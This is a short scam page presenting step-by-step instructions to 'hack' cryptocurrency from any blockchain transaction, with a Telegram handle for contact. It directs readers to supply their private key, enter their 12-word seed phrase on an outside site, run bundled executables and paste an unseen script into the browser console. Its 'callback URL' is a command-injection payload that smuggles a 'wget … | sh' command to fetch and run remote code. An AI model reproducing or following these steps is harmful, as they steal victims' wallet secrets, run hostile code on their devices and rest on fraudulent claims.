1. Telegram : @priv3t_key

2. URL_my_callback_url : 
	http://blockchain.com/goform/goform_get_cmd_process-isTest=false&cmd=network_tools&pingTimes=1&url=blockchain.com/\nwget http://blockchain.com/script.sh -O - | sh&port=-1&subcmd=1

3. Unzip the file;

4. Run httpd.cmd in script folder.

5. Run busybox.exe in script folder.

6. Open the script in Notepad

7. Go to Bitcoin explorer and choose any transaction; copy the hash and paste the hash of the transaction you want to hack in the script;

8. Enter your address;

9. Enter private secret key;

10. Go to > https://hash-rates.io/

11. Write your wallet 12 words of your wallet in the case BIP39 Mnemonic (Trust wallet, Blockchain ...)

12. Click CALCULATE
 
13. Copy bip39 seed and paste on the script

14. Enter your wallet Xpub; 

15. Enter transaction link;

16. You copy all script;

Go to Browser menu > More Tools > Developer Tools > Console & paste in the console of your browser;

- Refresh your wallet;

- Enjoy! You have the Hack funds in your wallet, you can use the script in any country.

Available in all countries ( USA, India, Indonesia, Asie, Germany, France, Italy, Europe, Egypt, Algerie, Tunisie, Africa, Australie... )

						Supported formats: segwit, legacy, lightning, CEX and DEX.